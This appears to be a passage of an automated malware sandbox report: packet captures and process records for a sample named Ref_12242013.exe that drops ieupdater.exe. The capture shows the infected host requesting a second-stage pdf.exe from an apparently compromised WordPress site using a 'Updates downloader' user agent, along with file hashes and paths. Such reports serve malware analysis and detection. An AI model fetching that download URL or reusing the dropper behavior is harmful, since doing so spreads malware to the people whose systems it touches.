Jun 5, 2014 13:05:19.342834949 CEST80103238.102.226.69192.168.1.10Data Raw: 6d 70 6c 65 20 53 79 6e 64 69 63 61 74 69 6f 6e 22 3e 52 53 53 3c 2f 61 62 62 72 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 09 09 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 20 74 69 74 6c 65
Data Ascii: mple Syndication">RSS</abbr></a></li><li><a href="http://wordpress.org/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.org</a></li></ul></aside></div> .widget-area --></div><
25
Jun 5, 2014 13:05:19.980375051 CEST80103364.74.223.34192.168.1.10HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7477
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=6919fc02-27ef-4090-bed1-5234bf1fe9c6; path=/
Set-Cookie: VisitorID=582a28ee-461a-4a82-9824-efe49f9a92a1&Exp=6/5/2017 4:05:19 AM; expires=Mon, 05-Jun-2017 11:05:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 05 Jun 2014 11:05:20 GMT
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e
Data Ascii: <!doctype html><html>
26
Jun 5, 2014 13:05:19.983627081 CEST103480192.168.1.1038.102.226.69GET /wp-content/uploads/2012/09/pdf.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: ruedigerbaltissen.com
Cookie: PHPSESSID=2a7b875c096aecdecb60c18df4bdcc6b
26
Jun 5, 2014 13:05:20.093738079 CEST80103364.74.223.34192.168.1.10Data Raw: 0d 0a 09 0d 0a 3c 68 65 61 64 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65
Data Ascii: <head><meta charset="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/><meta name="viewport" content="width=device-width, initial-scale=1"/> <title>Bestwsos.com</title><meta name="keywords" con
28
Jun 5, 2014 13:05:20.093748093 CEST80103364.74.223.34192.168.1.10Data Raw: 2c 0d 0a 20 20 20 20 27 61 64 74 65 73 74 27 3a 20 27 6f 66 66 27 2c 0d 0a 20 20 20 20 27 68 6c 27 3a 20 27 27 0d 0a 7d 3b 0d 0a 0d 0a 76 61 72 20 73 65 61 72 63 68 62 6f 78 42 6c 6f 63 6b 20 3d 0d 0a 7b 0d 0a 20 20 20 20 27 63 6f 6e 74 61 69 6e
Data Ascii: , 'adtest': 'off', 'hl': ''};var searchboxBlock ={ 'container': 'searchbox', 'type': 'searchbox', 'width': '300px', 'widthSearchButton': 70, 'colorBackground': 'transparent', 'colorSearchButton':
29
Jun 5, 2014 13:05:20.094058037 CEST80103364.74.223.34192.168.1.10Data Raw: 20 20 20 27 74 69 6d 65 27 3a 20 27 36 2f 35 2f 32 30 31 34 20 34 3a 30 35 3a 32 31 20 41 4d 27 2c 0d 0a 20 20 20 20 27 74 69 63 6b 73 27 3a 20 27 36 33 35 33 37 35 33 37 39 32 31 34 38 34 30 35 32 35 27 2c 0d 0a 20 20 20 20 27 64 6f 6d 61 69 6e
Data Ascii: 'time': '6/5/2014 4:05:21 AM', 'ticks': '635375379214840525', 'domainName': 'bestwsos.com', 'searchText': '', 'actionCode': 'InitialView', 'adNetworkID': '2010001', 'moduleID': '29', 'resultLinkType': '5',
30
Jun 5, 2014 13:05:20.129718065 CEST80103364.74.223.34192.168.1.10Data Raw: 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 5d 2c 0d 0a 20 20 20 20 27 61 70 69 49 74 65 72 61 74 69 6f 6e 27 3a 20 30 2c 0d 0a 20 20 20 20 27 6d 6f 62 69 6c 65 42 72 6f 77 73 65 72 54 79 70 65 27 3a 20 34 2c 0d 0a 20 20 20 20 27 61 64 4c
Data Ascii: } ], 'apiIteration': 0, 'mobileBrowserType': 4, 'adLineFormat': 3, 'wClass': 'wr', 'terms': '', 'adHeader': 'Sponsored Listings'};new google.ads.domains.Caf(pageOptions, searchboxBlock, rsbloc
31
Jun 5, 2014 13:05:20.130269051 CEST80103364.74.223.34192.168.1.10Data Raw: 68 65 5f 54 69 6d 65 3a 20 35 6d 73 20 28 31 38 25 29 0d 0a 20 20 20 20 20 20 20 44 61 74 61 62 61 73 65 5f 54 69 6d 65 3a 20 32 30 6d 73 20 28 36 34 25 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 41 50 49 5f 54 69 6d 65 3a 20 33 6d 73 20 28 31
Data Ascii: he_Time: 5ms (18%) Database_Time: 20ms (64%) API_Time: 3ms (12%)=================================================** END DEBUG OUTPUT **=================================================-->
33
Jun 5, 2014 13:05:20.130831957 CEST80103364.74.223.34192.168.1.10Data Raw: 72 79 20 7b 20 72 65 74 75 72 6e 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 27 29 3b 20 7d 20 63 61 74 63 68 28 65 29 20 7b 7d 0d 0a 20 20 74 72 79 20 7b 20 72 65 74 75 72 6e 20
Data Ascii: ry { return new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) {} try { return new XMLHttpRequest(); } catch(e) {} return null;}GetIPPI('34b04ecb-c76f-4abb-b58f-6e26dff7a3cf');</script><script type="text/javascript">var gaJ
34
Jun 5, 2014 13:05:21.315256119 CEST80103438.102.226.69192.168.1.10HTTP/1.1 404 Not Found
Date: Thu, 05 Jun 2014 11:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://ruedigerbaltissen.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="CAO IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: cookies=yes; expires=Thu, 05-Jun-2014 12:05:19 GMT
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Raw: 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d
Data Ascii: 34<!DOCTYPE htm
35
Jun 5, 2014 13:05:21.438172102 CEST80103438.102.226.69192.168.1.10Data Raw: 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 0d 0a 63 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 0d 0a 33 33 0d 0a 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b
Data Ascii: l> [if IE 7]><html class="ie ie7" clang="en-US"33><![endif]--> [if IE 8]><html class="ie ie8" clang="en-US"38><![endif]--> [if !(IE 7) | !(IE 8) ]> ><html clang="en-US"
35
Jun 5, 2014 13:05:21.470055103 CEST80103438.102.226.69192.168.1.10Data Raw: 32 61 0d 0a 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a 33 36 64 37 0d 0a 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72
Data Ascii: 2a> <![endif]--><head><meta charset="36d7UTF-8"><meta name="viewport" content="width=device-width"><title>Page not found | Betriebliche Altersvorsorge</title><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pin
36
Jun 5, 2014 13:05:21.470083952 CEST80103438.102.226.69192.168.1.10Data Raw: 79 74 68 69 72 74 65 65 6e 2f 63 73 73 2f 69 65 2e 63 73 73 3f 76 65 72 3d 32 30 31 33 2d 30 37 2d 31 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c
Data Ascii: ythirteen/css/ie.css?ver=2013-07-18' type='text/css' media='all' /><![endif]--><script type='text/javascript' src='http://ruedigerbaltissen.com/wp-includes/js/jquery/jquery.js?ver=1.10.2'></script><script type='text/javascript' src='http://
38
Jun 5, 2014 13:05:21.470094919 CEST80103438.102.226.69192.168.1.10Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6d 61 69 6c 3a 20 65 6d 61 69 6c 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 73 74 6e 61 6d 65 20 3a 20 6c 69 73 74 6e 61 6d 65 2c 0d 0a 20 20 20 20 20 20 20 20 20
Data Ascii: email: email, listname : listname, meta_web_form_id: meta_web_form_id, meta_message: meta_message, redirect: redirect, met
39
Jun 5, 2014 13:05:21.470556021 CEST80103438.102.226.69192.168.1.10Data Raw: 20 20 20 20 20 20 20 20 20 20 73 70 65 63 69 61 6c 69 64 3a 20 73 70 65 63 69 61 6c 69 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 69 65 6e 74 69 64 3a 20 63 6c 69 65 6e 74 69 64 2c 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: specialid: specialid, clientid: clientid, formid:
40
Jun 5, 2014 13:05:21.473357916 CEST80103438.102.226.69192.168.1.10Data Raw: 66 6f 72 6d 69 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 61 6c 6c 69 73 74 69 64 3a 20 72 65 61 6c 6c 69 73 74 69 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 75 62 6c 65 6f 70
Data Ascii: formid, reallistid: reallistid, doubleopt: doubleopt, redirect: redirect, errorredirect: errorredirect }; jQuery.post('/wp-admin/admi
41
Jun 5, 2014 13:05:21.473386049 CEST80103438.102.226.69192.168.1.10Data Raw: 65 78 65 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 4c 63 4e 61 6d 65 28 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: exe"; } function LcName() { return "likehttpruedigerbaltissencomwpcontentuploads201209pdfexe"; } function GcName() {
43
Jun 5, 2014 13:05:21.473948956 CEST80103438.102.226.69192.168.1.10Data Raw: 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 22 63 6f 6d 68 74 74 70 72 75 65 64 69 67 65 72 62 61 6c 74 69 73 73 65 6e 63 6f 6d 77 70 63 6f 6e 74 65 6e 74 75 70 6c 6f 61 64 73 32 30 31 32 30
Data Ascii: { return "comhttpruedigerbaltissencomwpcontentuploads201209pdfexe"; }</script><style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
44
Jun 5, 2014 13:05:21.482744932 CEST80103438.102.226.69192.168.1.10Data Raw: 69 74 6c 65 22 3e 42 65 74 72 69 65 62 6c 69 63 68 65 20 41 6c 74 65 72 73 76 6f 72 73 6f 72 67 65 3c 2f 68 31 3e 0a 09 09 09 09 3c 68 32 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 2f 68 32 3e 0a 09 09 09 3c
Data Ascii: itle">Betriebliche Altersvorsorge</h1><h2 class="site-description"></h2></a><div id="navbar" class="navbar"><nav id="site-navigation" class="navigation main-navigation" role="navigation"><h3 class="menu-toggle">Menu</h
45
Jun 5, 2014 13:05:21.519324064 CEST80103438.102.226.69192.168.1.10Data Raw: 6f 6e 3d 22 68 74 74 70 3a 2f 2f 72 75 65 64 69 67 65 72 62 61 6c 74 69 73 73 65 6e 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65
Data Ascii: on="http://ruedigerbaltissen.com/"><label><span class="screen-reader-text">Search for:</span><input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /></label><in
46
Jun 5, 2014 13:05:21.519355059 CEST80103438.102.226.69192.168.1.10Data Raw: 6f 6c 65 3d 22 63 6f 6d 70 6c 65 6d 65 6e 74 61 72 79 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 61 72 65 61 22 3e 0a 09 09 09 3c 61 73 69 64 65 20 69 64 3d 22 73 65 61 72 63 68 2d 32 22 20 63 6c 61 73 73 3d 22 77 69
Data Ascii: ole="complementary"><div class="widget-area"><aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="http://ruedigerbaltissen.com/"><label><span class="screen-reader-text
48
Jun 5, 2014 13:05:21.519366026 CEST80103438.102.226.69192.168.1.10Data Raw: 77 69 64 67 65 74 5f 61 72 63 68 69 76 65 22 3e 3c 68 33 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 74 69 74 6c 65 22 3e 41 72 63 68 69 76 65 73 3c 2f 68 33 3e 09 09 3c 75 6c 3e 0a 09 09 09 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a
Data Ascii: widget_archive"><h3 class="widget-title">Archives</h3><ul><li><a href='http://ruedigerbaltissen.com/2013/12' title='December 2013'>December 2013</a></li><li><a href='http://ruedigerbaltissen.com/2012/09' title='September 2012'>Septembe
49
Jun 5, 2014 13:05:21.519810915 CEST80103438.102.226.69192.168.1.10Data Raw: 6e 66 6f 20 2d 2d 3e 0a 09 09 3c 2f 66 6f 6f 74 65 72 3e 3c 21 2d 2d 20 23 63 6f 6c 6f 70 68 6f 6e 20 2d 2d 3e 0a 09 3c 2f 64 69 76 3e 3c 21 2d 2d 20 23 70 61 67 65 20 2d 2d 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a
Data Ascii: nfo --></footer> #colophon --></div> #page --><script type='text/javascript' src='http://ruedigerbaltissen.com/wp-includes/js/jquery/jquery.masonry.min.js?ver=2.1.05'></script><script type='text/javascript' src='http://ruedige
50

Hooks - Code Manipulation Behavior

System Behavior

Analysis Process: Ref_12242013.exe PID: 972 Parent PID: 1608

General

Start time:15:20:42
Start date:05/06/2014
Path:C:\Ref_12242013.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0x400000
File size:12800 bytes
MD5 hash:C77DD48C57156A20F0E32022E489546E

Chronological Activities

Analysis Process: ieupdater.exe PID: 248 Parent PID: 972

General

Start time:15:20:43
Start date:05/06/2014
Path:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ieupdater.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ieupdater.exe
Imagebase:0x400000
File size:12840 bytes
MD5 hash:DE158F1023935942A4ECED310FA6BBB5

Chronological Activities

Disassembly

< >